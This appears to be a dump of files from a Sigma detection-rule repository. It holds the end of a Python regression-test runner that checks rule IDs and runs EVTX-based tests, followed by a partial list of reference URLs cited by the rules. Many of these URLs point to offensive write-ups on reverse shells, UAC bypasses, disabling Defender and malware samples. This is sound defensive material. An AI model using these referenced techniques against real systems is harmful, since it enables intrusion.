[]\n    for rule_info in rules_with_tests:\n        rule_path = rule_info[\"path\"]\n        rule_id = rule_info[\"id\"]\n        tests = rule_info[\"tests\"]\n\n        if args.verbose:\n            print(f\"\\nTesting rule: {rule_id}\")\n            print(f\"  File: {rule_path}\")\n\n        for i, test_data in enumerate(tests):\n            test_name = test_data.get(\"name\", f\"Test {i+1}\")\n            test_type = test_data.get(\"type\", \"unknown\")\n            test_path = test_data.get(\"path\", \"unknown\")\n\n            if args.verbose:\n                print(f\"  {test_name} (type: {test_type}): {test_path}\")\n            total_tests += 1\n\n            success, output = run_test(\n                rule_path, rule_id, test_data, args.evtx_checker, args.thor_config\n            )\n\n            if success:\n                passed_tests += 1\n                if args.verbose:\n                    print(f\"    ✓ PASS - Match found for Rule ID: {rule_id}\\n\")\n                    print(f\"    Output: {output}\")\n            else:\n                failures.append(\n                    {\n                        \"rule_id\": rule_id,\n                        \"rule_path\": rule_path,\n                        \"test_name\": test_name,\n                        \"test_type\": test_type,\n                        \"test_path\": test_path,\n                        \"test_number\": i + 1,\n                    }\n                )\n                if args.verbose:\n                    print(\"    ✗ FAIL\")\n\n        if args.verbose:\n            print()\n    return total_tests, passed_tests, failures\n\n\ndef validate_missing_tests(\n    args: argparse.Namespace,\n    rules_with_tests: List[Dict],\n    missing_regression_tests_path: List[Dict],\n) -> None:\n    \"\"\"Print rules missing regression_tests_path and handle validation.\"\"\"\n\n    # Check for missing regression_tests_path in test/stable rules\n    if missing_regression_tests_path and not args.ignore_validation:\n        print()\n        print(\"-\" * 50)\n        print(\"RULES MISSING REGRESSION_TESTS_PATH:\")\n        print(\"-\" * 50)\n        for missing in missing_regression_tests_path:\n            print(f\"Rule: {missing['rule_id']} (status: {missing['status']})\")\n            print(f\"  File: {missing['rule_path']}\")\n            print()\n        print(\"=\" * 70)\n        print(\n            \"Rules with status 'test' or 'stable' must have a 'regression_tests_path' field.\"\n        )\n        print(\"Please add regression tests for these rules or change their status.\")\n        print(\"=\" * 70)\n        print(\n            f\"\\nERROR: Found {len(missing_regression_tests_path)} \"\n            \"test/stable rule(s) without regression_tests_path.\"\n        )\n\n        sys.exit(1)\n    elif missing_regression_tests_path and args.ignore_validation:\n        print(\n            f\"\\nWARNING: Found {len(missing_regression_tests_path)} \"\n            \"test/stable rule(s) without regression_tests_path (validation ignored)\"\n        )\n        print(\n            \"Consider adding regression tests for these rules \"\n            \"or changing their status to 'experimental'.\"\n        )\n\n    # If validate-only mode, exit successfully after validation\n    if args.validate_only:\n        if args.ignore_validation and missing_regression_tests_path:\n            print(\"✅ All rules passed validation (validation ignored)!\")\n        else:\n            print(\"✅ All rules passed validation!\")\n        print(f\"Found {len(rules_with_tests)} rules with regression tests configured.\")\n        sys.exit(0)\n\n\ndef check_missing_test_files(missing_files: List[Dict]) -> None:\n    \"\"\"Check for missing test files and print errors if any are found.\"\"\"\n    if not missing_files:\n        return\n\n    print(f\"\\nERROR: Found {len(missing_files)} missing file(s):\")\n    print(\"=\" * 60)\n\n    regression_test_files = [\n        f for f in missing_files if f[\"file_type\"] == \"regression_tests_path\"\n    ]\n    test_files = [f for f in missing_files if f[\"file_type\"] == \"test_file\"]\n\n    if regression_test_files:\n        print(f\"\\nMISSING REGRESSION TEST INFO FILES ({len(regression_test_files)}):\")\n        print(\"-\" * 50)\n        for missing in regression_test_files:\n            print(f\"Rule: {missing['rule_id']}\")\n            print(f\"  File: {missing['rule_path']}\")\n            print(f\"  Missing: {missing['missing_file']}\")\n            print()\n\n    if test_files:\n        print(f\"\\nMISSING TEST DATA FILES ({len(test_files)}):\")\n        print(\"-\" * 50)\n        for missing in test_files:\n            print(f\"Rule: {missing['rule_id']}\")\n            print(f\"  File: {missing['rule_path']}\")\n            print(f\"  Test: {missing['test_name']} (type: {missing['test_type']})\")\n            print(f\"  Missing: {missing['missing_file']}\")\n            print()\n\n    print(\"=\" * 60)\n    print(\"Please ensure all referenced files exist before running tests.\")\n    sys.exit(1)\n\n\ndef print_summary(total_tests: int, passed_tests: int, failures: List[Dict]) -> None:\n    \"\"\"Print a summary of the test results.\"\"\"\n    print(\"=\" * 60)\n    print(\"REGRESSION TEST SUMMARY\")\n    print(\"=\" * 60)\n    print(f\"Total tests run: {total_tests}\")\n    print(f\"Passed: {passed_tests}\")\n    print(f\"Failed: {len(failures)}\")\n\n    if total_tests > 0:\n        success_rate = (passed_tests / total_tests) * 100\n        print(f\"Success rate: {success_rate:.1f}%\")\n\n    # Print failures\n    if failures:\n        print(f\"\\nFAILED TESTS ({len(failures)}):\")\n        print(\"-\" * 40)\n        for failure in failures:\n            print(f\"Rule: {failure['rule_id']}\")\n            print(f\"  File: {failure['rule_path']}\")\n            print(f\"  Test: {failure['test_name']} (type: {failure['test_type']})\")\n            print(f\"  Path: {failure['test_path']}\")\n            print()\n\n    print(\"=\" * 60)\n\n\ndef check_rule_id_consistency(rules_with_tests: List[Dict]) -> List[Dict]:\n    \"\"\"Check if rule IDs are consistent between rule files and their info.yml files.\n    Also checks if rule IDs match the test file names.\n\n    Returns:\n        List of dicts containing information about inconsistent rule IDs\n    \"\"\"\n    inconsistent_rules = []\n\n    for rule_info in rules_with_tests:\n        rule_id = rule_info[\"id\"]\n        info_metadata_rule_id = rule_info.get(\"info_metadata_rule_id\", \"\")\n        rule_path = rule_info[\"path\"]\n        tests = rule_info.get(\"tests\", [])\n\n        # Check rule ID vs info.yml rule_metadata[0].id consistency\n        if not info_metadata_rule_id:\n            inconsistent_rules.append(\n                {\n                    \"rule_id\": rule_id,\n                    \"info_metadata_rule_id\": info_metadata_rule_id,\n                    \"rule_path\": rule_path,\n                    \"issue\": \"missing_info_metadata_rule_id\",\n                    \"expected\": rule_id,\n                    \"actual\": info_metadata_rule_id,\n                    \"message\": \"info.yml is missing rule_metadata or rule_metadata[0].id\",\n                }\n            )\n        elif rule_id != info_metadata_rule_id:\n            inconsistent_rules.append(\n                {\n                    \"rule_id\": rule_id,\n                    \"info_metadata_rule_id\": info_metadata_rule_id,\n                    \"rule_path\": rule_path,\n                    \"issue\": \"rule_vs_info_metadata_mismatch\",\n                    \"expected\": rule_id,\n                    \"actual\": info_metadata_rule_id,\n                    \"message\": f\"Rule ID '{rule_id}' in rule file does not match \"\n                    f\"info.yml rule_metadata[0].id '{info_metadata_rule_id}'\",\n                }\n            )\n\n        # Check rule ID vs test file name consistency\n        for test in tests:\n            test_path = test.get(\"path\", \"\")\n            if test_path:\n                # Extract filename without extension\n                filename = os.path.basename(test_path)\n                name_without_ext = os.path.splitext(filename)[0]\n                file_ext = os.path.splitext(filename)[1].lower()\n\n                # Check if the filename (without extension) matches the rule ID\n                # Only check for .evtx and .json files (.json is optional conversion of .evtx)\n                if file_ext in [\".evtx\", \".json\"] and name_without_ext != rule_id:\n                    expected_filename = f\"{rule_id}{file_ext}\"\n                    inconsistent_rules.append(\n                        {\n                            \"rule_id\": rule_id,\n                            \"test_filename\": filename,\n                            \"rule_path\": rule_path,\n                            \"test_path\": test_path,\n                            \"issue\": \"rule_vs_testfile_mismatch\",\n                            \"expected\": expected_filename,\n                            \"actual\": filename,\n                            \"message\": f\"Rule ID '{rule_id}' does not match test file\"\n                            f\"name '{name_without_ext}' (expected: {rule_id}{file_ext})\",\n                        }\n                    )\n\n    if inconsistent_rules:\n        print(\"\\nERROR: Found rule ID inconsistencies:\")\n        print(\"=\" * 60)\n        print()\n\n        # Group by issue type for better readability\n        rule_vs_info_issues = [\n            r\n            for r in inconsistent_rules\n            if r.get(\"issue\")\n            in [\"rule_vs_info_metadata_mismatch\", \"missing_info_metadata_rule_id\"]\n        ]\n        rule_vs_testfile_issues = [\n            r\n            for r in inconsistent_rules\n            if r.get(\"issue\") == \"rule_vs_testfile_mismatch\"\n        ]\n\n        if rule_vs_info_issues:\n            print(\"RULE ID vs INFO.YML RULE_METADATA[0].ID MISMATCHES:\")\n            print(\"-\" * 50)\n            for inconsistent in rule_vs_info_issues:\n                print(f\"Rule file ID: {inconsistent['rule_id']}\")\n                print(\n                    f\"Info.yml rule_metadata[0].id: {inconsistent['info_metadata_rule_id']}\"\n                )\n                print(f\"Expected: {inconsistent['expected']}\")\n                print(f\"Actual: {inconsistent['actual']}\")\n                print(f\"Rule file: {inconsistent['rule_path']}\")\n                print(f\"Message: {inconsistent['message']}\")\n                print(\"-\" * 50)\n                print()\n\n        if rule_vs_testfile_issues:\n            print(\"RULE ID vs TEST FILE NAME MISMATCHES:\")\n            print(\"-\" * 40)\n            for inconsistent in rule_vs_testfile_issues:\n                print(f\"Rule ID: {inconsistent['rule_id']}\")\n                print(f\"Expected filename: {inconsistent['expected']}\")\n                print(f\"Actual filename: {inconsistent['actual']}\")\n                print(f\"Rule file: {inconsistent['rule_path']}\")\n                print(f\"Test file: {inconsistent['test_path']}\")\n                print(f\"{inconsistent['message']}\")\n                print()\n\n        print(\"<=>\" * 20)\n        print(\"Rule IDs must match between:\")\n        print(\"1. Rule files ID and their info.yml rule_metadata[0].id\")\n        print(\"2. Rule files ID and their test file names (EVTX/JSON files)\")\n        print(\"   Note: JSON files are optional conversions of EVTX files\")\n    return inconsistent_rules\n\n\ndef main():\n    \"\"\"Main function to run regression tests for Sigma rules.\"\"\"\n    args = parse_arguments()\n    init_checks(args)\n\n    # Find rules with tests\n    print(\"Scanning for rules with test data...\")\n    rules_with_tests, missing_files, missing_regression_tests_path = (\n        find_rules_with_tests(args.rules_paths)\n    )\n\n    print(f\"Found {len(rules_with_tests)} rule(s) with regression tests configured.\\n\")\n\n    print(\"Checking for consistent rule <--> test mapping...\")\n    inconsistent_rules = check_rule_id_consistency(rules_with_tests)\n    if inconsistent_rules:\n        sys.exit(1)\n    else:\n        print(\"All rules are mapped correctly.\")\n\n    validate_missing_tests(args, rules_with_tests, missing_regression_tests_path)\n    check_missing_test_files(missing_files)\n    print()\n    if not rules_with_tests:\n        print(\"No rules with test data found\")\n        sys.exit(1)\n\n    # Test each rule\n    print(\"Running tests...\\n\")\n    total_tests, passed_tests, failures = run_tests(args, rules_with_tests)\n\n    print_summary(total_tests, passed_tests, failures)\n\n    # Exit with error code if any tests failed\n    if failures:\n        sys.exit(1)\n\n\nif __name__ == \"__main__\":\n    main()\n"
  },
  {
    "path": "tests/rule-references.txt",
    "content": "http://0xthem.blogspot.com/2014/03/t-emporal-persistence-with-and-schtasks.html\nhttp://addbalance.com/word/startup.htm\nhttp://az4n6.blogspot.com/2016/02/more-on-trust-records-macros-and.html\nhttp://blog.harmj0y.net/redteaming/operational-guidance-for-offensive-user-dpapi-abuse/\nhttp://blog.sevagas.com/?Hacking-around-HTA-files\nhttp://blog.sevagas.com/?Yet-another-sdclt-UAC-bypass\nhttp://blog.talosintelligence.com/2022/09/lazarus-three-rats.html\nhttp://carnal0wnage.attackresearch.com/2012/06/webdav-server-to-download-custom.html\nhttp://edgeguides.rubyonrails.org/security.html\nhttp://etutorials.org/Microsoft+Products/microsoft+windows+server+2003+terminal+services/Chapter+6+Registry/Registry+Keys+for+Terminal+Services/\nhttp://guides.rubyonrails.org/action_controller_overview.html\nhttp://hyp3rlinx.altervista.org/advisories/MICROSOFT_WINDOWS_DEFENDER_DETECTION_BYPASS.txt\nhttp://hyp3rlinx.altervista.org/advisories/Windows_TCPIP_Finger_Command_C2_Channel_and_Bypassing_Security_Software.txt\nhttp://managed670.rssing.com/chan-5590147/all_p1.html\nhttp://pastebin.com/FtygZ1cg\nhttp://powershellhelp.space/commands/set-netfirewallrule-psv5.php\nhttp://redplait.blogspot.com/2020/07/whats-wrong-with-etw.html\nhttp://remoteawesomethoughts.blogspot.com/2019/05/windows-10-task-schedulerservice.html\nhttp://resources.netsupportsoftware.com/resources/manualpdfs/nsm_manual_uk.pdf\nhttp://rules.emergingthreats.net/open/snort-2.9.0/rules/emerging-user_agents.rules\nhttp://security-research.dyndns.org/pub/slides/FIRST2017/FIRST-2017_Tom-Ueltschi_Sysmon_FINAL_notes.pdf\nhttp://woshub.com/how-to-clear-rdp-connections-history/\nhttp://woshub.com/manage-windows-firewall-powershell/\nhttp://woshub.com/rds-shadow-how-to-connect-to-a-user-session-in-windows-server-2012-r2/\nhttp://www.botopedia.org/search?searchword=scan&searchphrase=all\nhttp://www.danielbohannon.com/blog-1/2017/3/12/powershell-execution-argument-obfuscation-how-it-can-make-detection-easier\nhttp://www.gmer.net/\nhttp://www.irongeek.com/homoglyph-attack-generator.php\nhttp://www.korznikov.com/2017/03/0-day-or-feature-privilege-escalation.html\nhttp://www.leeholmes.com/blog/2017/03/17/detecting-and-preventing-powershell-downgrade-attacks/\nhttp://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/\nhttp://www.powertheshell.com/ntfsstreams/\nhttp://www.securityfocus.com/infocus/1633\nhttp://www.solomonson.com/posts/2010-07-09-reading-eventviewer-command-line/\nhttp://www.sqlinjection.net/errors\nhttp://www.stuffithoughtiknew.com/2019/02/detecting-bloodhound.html\nhttp://www.windowexe.com/bbs/board.php?q=jsschhlp-exe-c-program-files-common-files-justsystem-jsschhlp-jsschhlp\nhttp://www.xuetr.com/\nhttps://0x00sec.org/t/clientside-exploitation-in-2018-how-pentesting-has-changed/7356\nhttps://0xdf.gitlab.io/2018/11/08/powershell-history-file.html\nhttps://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/\nhttps://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/\nhttps://4sysops.com/archives/use-powershell-to-download-a-file-with-http-https-and-ftp/\nhttps://aboutdfir.com/the-key-to-identify-psexec/\nhttps://abuse.io/lockergoga.txt\nhttps://academy.hackthebox.com/course/preview/active-directory-bloodhound/bloodhound--data-collection\nhttps://access.redhat.com/articles/4409591#audit-record-types-2\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/6/html/security_guide/sec-configuring_pam_for_auditing\nhttps://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/7/html/security_guide/sec-understanding_audit_log_files\nhttps://access.redhat.com/security/cve/cve-2019-14287\nhttps://adepts.of0x.cc/netsh-portproxy-code/\nhttps://admx.help/?Category=InternetExplorer&Policy=Microsoft.Policies.InternetExplorer::NoFirstRunCustomise\nhttps://admx.help/?Category=Office2016&Policy=excel16.Office.Microsoft.Policies.Windows::L_TrustedLoc01\nhttps://admx.help/?Category=Office2016&Policy=office16.Office.Microsoft.Policies.Windows::L_MacroRuntimeScanScope\nhttps://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.ControlPanelDisplay::CPL_Personalization_NoDesktopBackgroundUI\nhttps://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_IncludeUnspecifiedLocalSites\nhttps://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.InternetExplorer::IZ_ProxyByPass\nhttps://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.PowerShell::EnableScripts\nhttps://admx.help/?Category=Windows_10_2016&Policy=Microsoft.Policies.WindowsDesktop::Wallpaper\nhttps://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.InternetCommunicationManagement::EventViewer_DisableLinks\nhttps://admx.help/?Category=Windows_7_2008R2&Policy=Microsoft.Policies.WindowsDefender::SpyNetReporting\nhttps://admx.help/HKCU/software/policies/microsoft/office/16.0/excel/security/protectedview\nhttps://admx.help/HKLM/SOFTWARE/Policies/Microsoft/Windows%20NT/Terminal%20Services\nhttps://admx.help/HKLM/Software/Policies/Mozilla/Firefox/DNSOverHTTPS\nhttps://adsecurity.org/?p=1714\nhttps://adsecurity.org/?p=1772\nhttps://adsecurity.org/?p=2053\nhttps://adsecurity.org/?p=2277\nhttps://adsecurity.org/?p=2288\nhttps://adsecurity.org/?p=2398\nhttps://adsecurity.org/?p=2604\nhttps://adsecurity.org/?p=2921\nhttps://adsecurity.org/?p=3458\nhttps://adsecurity.org/?p=3466\nhttps://adsecurity.org/?p=3513\nhttps://advisory.splunk.com/advisories/SVD-2023-1104\nhttps://akhere.hashnode.dev/hunting-unsigned-dlls-using-kql\nhttps://alamot.github.io/reverse_shells/\nhttps://alternativeto.net/news/2023/5/cybercriminals-use-wordpad-vulnerability-to-spread-qbot-malware/\nhttps://andreafortuna.org/2018/11/12/process-injection-and-persistence-using-application-shimming/\nhttps://answers.microsoft.com/en-us/msoffice/forum/all/document-in-word-startup-folder-doesnt-open-when/44ab0932-2917-4150-8cdc-2f2cf39e86f3\nhttps://answers.microsoft.com/en-us/protect/forum/mse-protect_scanning/microsoft-antimalware-has-removed-history-of/f15af6c9-01a9-4065-8c6c-3f2bdc7de45e\nhttps://antgarsil.github.io/posts/velocity/\nhttps://any-api.com/amazonaws_com/eks/docs/API_Description\nhttps://any-api.com/googleapis_com/compute/docs/vpnTunnels\nhttps://any.run/report/3ecd4763ffc944fdc67a9027e459cd4f448b1a8d1b36147977afaf86bbf2a261/64b0ba45-e7ce-423b-9a1d-5b4ea59521e6\nhttps://any.run/report/68bc255f9b0db6a0d30a8f2dadfbee3256acfe12497bf93943bc1eab0735e45e/a2385d6f-34f7-403c-90d3-b1f9d2a90a5e\nhttps://anydesk.com/en/changelog/windows\nhttps://app.any.run/tasks/17f2d378-6d11-4d6f-8340-954b04f35e83/\nhttps://app.any.run/tasks/1df999e6-1cb8-45e3-8b61-499d1b7d5a9b/\nhttps://app.any.run/tasks/1efb3ed4-cc0f-4690-a0ed-24516809bc72/\nhttps://app.any.run/tasks/210244b9-0b6b-4a2c-83a3-04bd3175d017/\nhttps://app.any.run/tasks/214094a7-0abc-4a7b-a564-1b757faed79d/\nhttps://app.any.run/tasks/25970bb5-f864-4e9e-9e1b-cc8ff9e6386a\nhttps://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/\nhttps://app.any.run/tasks/2e0647b7-eb86-4f72-904b-d2d0ecac07d1/\nhttps://app.any.run/tasks/33d37fdf-158d-4930-aa68-813e1d5eb8ba/\nhttps://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/\nhttps://app.any.run/tasks/388d5802-aa48-4826-b069-250420504758/\nhttps://app.any.run/tasks/40115012-a919-4208-bfed-41e82cb3dadf/\nhttps://app.any.run/tasks/41ecdbde-4997-4301-a350-0270448b4c8f/\nhttps://app.any.run/tasks/4a54c651-b70b-4b72-84d7-f34d301d6406\nhttps://app.any.run/tasks/4bc9860d-ab51-4077-9e09-59ad346b92fd/\nhttps://app.any.run/tasks/512c1352-6380-4436-b27d-bb62f0c020d6/\nhttps://app.any.run/tasks/51e7185c-52d7-4efb-ac0d-e86340053473/\nhttps://app.any.run/tasks/579e7587-f09d-4aae-8b07-472833262965\nhttps://app.any.run/tasks/61a296bb-81ad-4fee-955f-3b399f4aaf4b\nhttps://app.any.run/tasks/6217d77d-3189-4db2-a957-8ab239f3e01e\nhttps://app.any.run/tasks/62bb01ae-25a4-4180-b278-8e464a90b8d7/\nhttps://app.any.run/tasks/64043a79-165f-4052-bcba-e6e49f847ec1/\nhttps://app.any.run/tasks/649e7b46-9bec-4d05-98a5-dfa9a13eaae5/\nhttps://app.any.run/tasks/65a79440-373a-4725-8d74-77db9f2abda4/\nhttps://app.any.run/tasks/6720b85b-9c53-4a12-b1dc-73052a78477d\nhttps://app.any.run/tasks/6d8cabb0-dcda-44b6-8050-28d6ce281687/\nhttps://app.any.run/tasks/7123e948-c91e-49e0-a813-00e8d72ab393/#\nhttps://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/\nhttps://app.any.run/tasks/76c69e2d-01e8-49d9-9aea-fb7cc0c4d3ad/\nhttps://app.any.run/tasks/77b2e328-8f36-46b2-b2e2-8a80398217ab/\nhttps://app.any.run/tasks/7ca5661d-a67b-43ec-98c1-dd7a8103c256/\nhttps://app.any.run/tasks/7e906adc-9d11-447f-8641-5f40375ecebb\nhttps://app.any.run/tasks/7eaba74e-c1ea-400f-9c17-5e30eee89906/\nhttps://app.any.run/tasks/81f3c28c-c686-425d-8a2b-a98198d244e1/\nhttps://app.any.run/tasks/84fc9b4a-ea2b-47b1-8aa6-9014402dfb56/\nhttps://app.any.run/tasks/8b9a571b-bcc1-4783-ba32-df4ba623b9c0/\nhttps://app.any.run/tasks/8bbd5b4c-b82d-4e6d-a3ea-d454594a37cc/\nhttps://app.any.run/tasks/8e22486b-5edc-4cef-821c-373e945f296c/\nhttps://app.any.run/tasks/93fe92fa-8b2b-4d92-8c09-a841aed2e793/\nhttps://app.any.run/tasks/97f875e8-0e08-4328-815f-055e971ba754/\nhttps://app.any.run/tasks/993daa5e-112a-4ff6-8b5a-edbcec7c7ba3\nhttps://app.any.run/tasks/9c0f37bc-867a-4314-b685-e101566766d7/\nhttps://app.any.run/tasks/a6aa0057-82ec-451f-8f99-55650ca537da/\nhttps://app.any.run/tasks/abdf586e-df0c-4d39-89a7-06bf24913401/\nhttps://app.any.run/tasks/b12cccf3-1c22-4e28-9d3e-c7a6062f3914/\nhttps://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/\nhttps://app.any.run/tasks/c28cabc8-a19f-40f3-a78b-cae506a5c0d4\nhttps://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/\nhttps://app.any.run/tasks/c5bef5b7-f484-4c43-9cf3-d5c5c7839def/\nhttps://app.any.run/tasks/c6993447-d1d8-414e-b856-675325e5aa09/\nhttps://app.any.run/tasks/c903e9c8-0350-440c-8688-3881b556b8e0/\nhttps://app.any.run/tasks/ce4deab5-3263-494f-93e3-afb2b9d79f14/\nhttps://app.any.run/tasks/cfc8870b-ccd7-4210-88cf-a8087476a6d0\nhttps://app.any.run/tasks/d66ead5a-faf4-4437-93aa-65785afaf9e5/\nhttps://app.any.run/tasks/d6fe6624-6ef8-485d-aa75-3d1bdda2a08c/\nhttps://app.any.run/tasks/d860402c-3ff4-4c1f-b367-0237da714ed1/\nhttps://app.any.run/tasks/e13ab713-64cf-4b23-ad93-6dceaa5429ac/\nhttps://app.any.run/tasks/e1fe6a62-bce8-4323-a49a-63795d9afd5d/\nhttps://app.any.run/tasks/ec207948-4916-47eb-a0f4-4c6abb2e7668/\nhttps://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/\nhttps://app.any.run/tasks/f74c5157-8508-4ac6-9805-d63fe7b0d399/\nhttps://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03\nhttps://app.any.run/tasks/fa99cedc-9d2f-4115-a08e-291429ce3692\nhttps://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/\nhttps://arcticwolf.com/resources/blog/lorenz-ransomware-chiseling-in/\nhttps://artkond.com/2017/03/23/pivoting-guide/\nhttps://asec.ahnlab.com/en/38156/\nhttps://asec.ahnlab.com/en/39828/\nhttps://asec.ahnlab.com/en/58878/\nhttps://asec.ahnlab.com/en/61000/\nhttps://asec.ahnlab.com/en/78944/\nhttps://assets.documentcloud.org/documents/20444693/fbi-pin-egregor-ransomware-bc-01062021.pdf\nhttps://atomicredteam.io/defense-evasion/T1220/\nhttps://attack.mitre.org/datasources/DS0005/\nhttps://attack.mitre.org/groups/G0010/\nhttps://attack.mitre.org/matrices/enterprise/cloud/\nhttps://attack.mitre.org/software/S0108/\nhttps://attack.mitre.org/software/S0404/\nhttps://attack.mitre.org/techniques/T1021/001/\nhttps://attack.mitre.org/techniques/T1064\nhttps://attack.mitre.org/techniques/T1090/\nhttps://attack.mitre.org/techniques/T1105/\nhttps://attack.mitre.org/techniques/T1548/001/\nhttps://attackerkb.com/topics/2faW2CxJgQ/cve-2023-4966\nhttps://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis\nhttps://attackerkb.com/topics/SSTk336Tmf/cve-2024-3400/rapid7-analysis\nhttps://awakesecurity.com/blog/threat-hunting-for-paexec/\nhttps://bad-jubies.github.io/RCE-NOW-WHAT/\nhttps://badoption.eu/blog/2023/01/31/code_c2.html\nhttps://bazaar.abuse.ch/browse/signature/RaspberryRobin/\nhttps://bazaar.abuse.ch/sample/64e6605496919cd76554915cbed88e56fdec10dec6523918a631754664b8c8d3/\nhttps://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/\nhttps://bazaar.abuse.ch/sample/8c75f8e94486f5bbf461505823f5779f328c5b37f1387c18791e0c21f3fdd576/\nhttps://bczyz1.github.io/2021/01/30/psexec.html\nhttps://bhabeshraj.com/post/tampering-with-microsoft-defenders-tamper-protection\nhttps://bi-zone.medium.com/from-pentest-to-apt-attack-cybercriminal-group-fin7-disguises-its-malware-as-an-ethical-hackers-c23c9a75e319\nhttps://bi-zone.medium.com/hunting-down-ms-exchange-attacks-part-1-proxylogon-cve-2021-26855-26858-27065-26857-6e885c5f197c\nhttps://bi-zone.medium.com/hunting-for-zerologon-f65c61586382\nhttps://bidouillesecurity.com/disable-windows-defender-in-powershell/\nhttps://bidouillesecurity.com/disable-windows-defender-in-powershell/#DisableAntiSpyware\nhttps://blackpointcyber.com/resources/blog/breaking-through-the-screen/\nhttps://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html\nhttps://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html\nhttps://blog.alsid.eu/dcshadow-explained-4510f52fc19d\nhttps://blog.alyac.co.kr/1901\nhttps://blog.aquasec.com/container-security-tnt-container-attack\nhttps://blog.assetnote.io/2021/11/02/sitecore-rce/\nhttps://blog.assetnote.io/2022/09/14/rce-in-bitbucket-server/\nhttps://blog.binarydefense.com/reliably-detecting-pass-the-hash-through-event-log-analysis\nhttps://blog.blacklanternsecurity.com/p/detecting-dcsync?s=r\nhttps://blog.bushidotoken.net/2021/04/dead-drop-resolvers-espionage-inspired.html\nhttps://blog.cloudflare.com/how-cloudflare-mitigated-yet-another-okta-compromise/\nhttps://blog.cluster25.duskrise.com/2023/05/22/back-in-black-blackbyte-nt\nhttps://blog.cobaltstrike.com/2013/08/08/why-is-notepad-exe-connecting-to-the-internet/\nhttps://blog.cobaltstrike.com/2014/04/02/what-happens-when-i-type-getsystem/\nhttps://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/\nhttps://blog.cobaltstrike.com/2021/02/09/learn-pipe-fitting-for-all-of-your-offense-projects/\nhttps://blog.cyble.com/2022/04/21/prynt-stealer-a-new-info-stealer-performing-clipper-and-keylogger-activities/\nhttps://blog.cyble.com/2022/06/07/bumblebee-loader-on-the-rise/\nhttps://blog.cyble.com/2022/07/21/qakbot-resurfaces-with-new-playbook/\nhttps://blog.cyble.com/2022/07/27/targeted-attacks-being-carried-out-via-dll-sideloading/\nhttps://blog.cyble.com/2022/08/10/onyx-ransomware-renames-its-leak-site-to-vsop/\nhttps://blog.cyble.com/2023/01/12/rhadamanthys-new-stealer-spreading-through-google-ads/\nhttps://blog.cyble.com/2023/01/18/aurora-a-stealer-using-shapeshifting-tactics/\nhttps://blog.didierstevens.com/2015/03/16/quickpost-metasploit-user-agent-strings/\nhttps://blog.dylan.codes/evading-sysmon-and-windows-event-logging/\nhttps://blog.eclecticiq.com/sandworm-apt-targets-ukrainian-users-with-trojanized-microsoft-kms-activation-tools-in-cyber-espionage-campaigns\nhttps://blog.emsisoft.com/en/32373/beware-new-wave-of-malware-spreads-via-iso-file-email-attachments/\nhttps://blog.f-secure.com/analysis-of-lockergoga-ransomware/\nhttps://blog.f-secure.com/hunting-for-koadic-a-com-based-rootkit/\nhttps://blog.f-secure.com/wp-content/uploads/2019/10/CosmicDuke.pdf\nhttps://blog.fox-it.com/2020/03/19/ldapfragger-command-and-control-over-ldap-attributes/\nhttps://blog.hackvens.fr/articles/CoercedPotato.html\nhttps://blog.harmj0y.net/activedirectory/the-most-dangerous-user-right-you-probably-have-never-heard-of/\nhttps://blog.harmj0y.net/redteaming/another-word-on-delegation/\nhttps://blog.harmj0y.net/redteaming/from-kekeo-to-rubeus\nhttps://blog.hrncirik.net/cve-2023-46214-analysis\nhttps://blog.jourdant.me/post/3-ways-to-download-files-with-powershell\nhttps://blog.lexfo.fr/Forensics-xortigate-notice.html\nhttps://blog.lexfo.fr/xortigate-cve-2023-27997.html\nhttps://blog.malwarebytes.com/malwarebytes-news/2020/10/kraken-attack-abuses-wer-service/\nhttps://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/\nhttps://blog.malwarebytes.com/threat-analysis/2020/04/new-agenttesla-variant-steals-wifi-credentials/\nhttps://blog.malwarebytes.com/threat-intelligence/2021/08/new-variant-of-konni-malware-used-in-campaign-targetting-russia/\nhttps://blog.malwarebytes.com/threat-intelligence/2022/01/north-koreas-lazarus-apt-leverages-windows-update-client-github-in-latest-campaign/\nhttps://blog.malwarebytes.com/threat-intelligence/2022/04/colibri-loader-combines-task-scheduler-and-powershell-in-clever-persistence-technique/\nhttps://blog.menasec.net/2019/02/threat-hunting-21-procdump-or-taskmgr.html\nhttps://blog.menasec.net/2019/02/threat-hunting-24-microsoft-windows-dns.html\nhttps://blog.menasec.net/2019/02/threat-hunting-3-detecting-psexec.html\nhttps://blog.menasec.net/2019/02/threat-hunting-5-detecting-enumeration.html\nhttps://blog.menasec.net/2019/02/threat-hunting-rdp-hijacking-via.html\nhttps://blog.menasec.net/2019/02/threat-huting-10-impacketsecretdump.html\nhttps://blog.menasec.net/2019/03/threat-hunting-25-scheduled-tasks-for.html\nhttps://blog.menasec.net/2019/03/threat-hunting-26-remote-windows.html\nhttps://blog.menasec.net/2019/07/interesting-difr-traces-of-net-clr.html\nhttps://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign\nhttps://blog.morphisec.com/vmware-identity-manager-attack-backdoor\nhttps://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin\n